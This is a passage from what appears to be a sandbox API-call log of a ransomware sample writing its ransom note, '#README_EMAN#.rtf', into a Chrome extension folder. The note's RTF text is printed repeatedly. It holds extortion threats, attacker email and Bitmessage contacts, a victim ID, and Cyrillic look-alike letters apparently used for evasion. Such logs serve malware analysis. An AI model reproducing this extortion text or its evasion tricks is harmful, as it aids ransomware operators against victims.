\\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7f\x03\r", lpUsedDefaultChar=0x0) returned 8717 [0298.496] WriteFile (in: hFile=0x228, lpBuffer=0x24866c8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x24866c8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0298.497] CloseHandle (hObject=0x228) returned 1 [0298.497] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\#readme_eman#.rtf")) returned 0xffffffff [0298.497] GetLastError () returned 0x2 [0298.497] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0298.498] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.498] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.498] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x24866c8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to 